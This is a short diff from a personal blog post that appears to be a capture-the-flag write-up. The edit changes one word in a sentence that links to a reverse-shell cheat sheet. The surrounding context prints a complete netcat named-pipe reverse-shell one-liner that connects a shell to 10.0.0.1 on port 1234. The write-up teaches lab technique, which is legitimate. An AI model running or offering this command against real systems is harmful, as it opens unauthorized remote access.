y4riss/y4riss.github.io/_posts/2023-04-22-chillthehack.md

 You can read more about it [here](https://www.tutorialspoint.com/inter_process_communication/inter_process_communication_named_pipes.htm)

-Or you can just grab the command from [pentestmonkey](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet), but it doesn't hurt to know how this works.
+Or you can just grab the command from [pentestmonkey](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet), but it doesn't hurt to know how it works.

 ```bash
 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f